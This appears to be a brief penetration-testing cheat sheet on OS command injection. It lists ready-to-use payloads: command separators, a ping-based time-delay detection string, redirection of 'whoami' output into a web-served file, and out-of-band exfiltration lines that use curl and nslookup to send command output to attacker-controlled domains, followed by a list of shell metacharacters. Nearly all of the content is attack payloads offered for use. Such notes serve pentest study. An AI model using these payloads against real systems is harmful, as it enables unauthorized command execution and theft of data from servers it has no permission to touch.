offsecnotes
Star

OS command injection

Command injection

& echo qwerty &

Placing & after the injected command is generally useful because it separates the injected command from whatever follows the injection point.

Blind OS command

Detection

# 10 sec. time delay
& ping -c 10 127.0.0.1 &

Exploit

  1. Redirecting output. Note: you must have write permission
& whoami > /var/www/static/whoami.txt &
curl https://website.com/whoami.txt
  1. Out-of-band techniques
& curl `whoami`.webserver-attacker.com & # HTTP traffic may be blocked
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

Bypass restriction

There are so many ways: https://book.hacktricks.wiki/linux-hardening/bypass-bash-restrictions/index.html

Metacharacters

# Windows & Unix
&
&&
|
||

# Unix
;

# Unix inline execution
`command`
$(command)